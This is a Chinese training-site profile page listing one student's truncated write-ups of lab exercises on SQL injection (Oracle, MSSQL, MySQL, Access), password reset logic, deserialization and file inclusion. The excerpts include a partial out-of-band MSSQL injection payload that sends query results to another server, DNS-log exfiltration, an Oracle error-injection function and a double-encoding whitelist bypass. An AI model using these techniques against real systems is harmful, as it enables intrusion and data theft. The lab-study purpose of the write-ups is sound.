Track 正式学员

安德烈

0关注
1粉丝
28文章
返回网站首页

您已发布 28篇文章作品写文章

Oracle注入- 报错注入WP——安德烈

打开靶场传送门,一脸懵逼,还有这种网址??长见识本关是Oracle注入- 报错注入,其实和mysql大同小异,按doufu老师课堂上讲的操作就行按页面提示填入/id=1,回车,出现正常页面(太。。。)一、注入点、注入类型判断单引号、and 1=1、and 1=2,大法经过研究,结合老师讲的,确定为:Oracle注入- 报错注入二、使用ctxsys.drithsx.sn()进行报错注入http://

 2018-10-24
 0 
 13 

MSSQL注入 - 反弹注入WP——安德烈

反弹注入中最关键的是,利用了OPENDATASOURCE函数。OPENDATASOURCE函数,使用较为通俗的语言来说明:“使用OPENDATASOURCE函数将当前数据库中查询的结果发送到另一数据库服务器中”。攻击前准备工作doufu老师都已做完,按视频操作就好。POChttp://120.203.13.75:8150/MSSQL/?id=2'; insert into opendata

 2018-10-24
 0 
 29 

MYSQL 注入 - Dns注入WP——安德烈

一、注册账号,需要绑定手机       注册账号https://sso.telnet404.com/cas/login?service=http%3A%2F%2Fapi.ceye.io%2Fv1%2Flogin       DNS_log平台http://ceye.io二、查库(使用pathinfo绕过狗狗)&nbsp

 2018-10-24
 0 
 31 

5.1、Access注入 — Cookie注入+偏移注入WP——安德烈

5.1.1、Access注入 — Cookie注入经典案例,和靶场公开课第二章一样,没什么好讲的参考文章cookie注入原理详解https://www.cnblogs.com/insane-Mr-Li/p/9142681.html5.1.2、Access注入 — 偏移注入视频上讲的注入,网上还有一种说法叫“移位溢注”,其实就是特殊偏移注入。一、移位溢注是一个全新的视角,其中的admin.*的引入很

 2018-10-23
 0 
 35 

密码找回WP——安德烈

密码找回漏洞也属于逻辑漏洞的一种,漏洞挖掘的关键还是在程序逻辑误区去寻找。还是黑白搭配,干活不累,通过靶场给出的提示http://120.203.13.75:8124/hahq_Admin/?umail=408362692@qq.com&type=ok利用burp抓包,发现后台处理这个页面的源代码所在位置对/Include/web_email.php源码进行审计,发现,重置密码语句没有做任

 2018-10-19
 0 
 45 

变量覆盖WP——安德烈

变量覆盖漏洞是指可以用我们自定义的参数值替换程序原有的变量值,从而产生漏洞。相关参考文章:PHP代码审计笔记--变量覆盖漏洞https://www.cnblogs.com/xiaozi/p/7768580.html代码审计之变量覆盖漏洞https://blog.csdn.net/qq_35420342/article/details/79689612言归正传,靶场题的思路是,通过审计多米cms2.

 2018-10-18
 0 
 24 

unserialize反序列化漏洞WP——安德烈

感觉做靶场这道题又回归到了漏洞产生的本质:对于输入、输出的控制。我们最终目的是利用程序的反序列化漏洞,读取./flag.php的源码,拿到flag。点击“Check Code”按钮,对源代码进行审计可以发现,我们POST提交的值最后被setcookie,以setcookie('todos', $h.$m);的形式,就是说我们POST提交的值,最后在cookie处

 2018-10-18
 0 
 41 

本地包含与远程包含漏洞WriteUp——安德烈

说实话,刚看到靶场这题也是一脸懵逼,phpMyAdmin?什么鬼?好像视频里面老师登录过,test、test,后来百度查资料,查Writeup,慢慢有了思路,这是一道LFI(本地文件包含漏洞)利用题,利用LFI进行拿shell,读取flag一、对phpMyAdmin481进行代码审计,发现可利用的LFILFI利用最精彩的部分在于双编码绕过白名单验证:利用双重编码绕过,将?经过两次编码%253f就绕

 2018-10-16
 1 
 57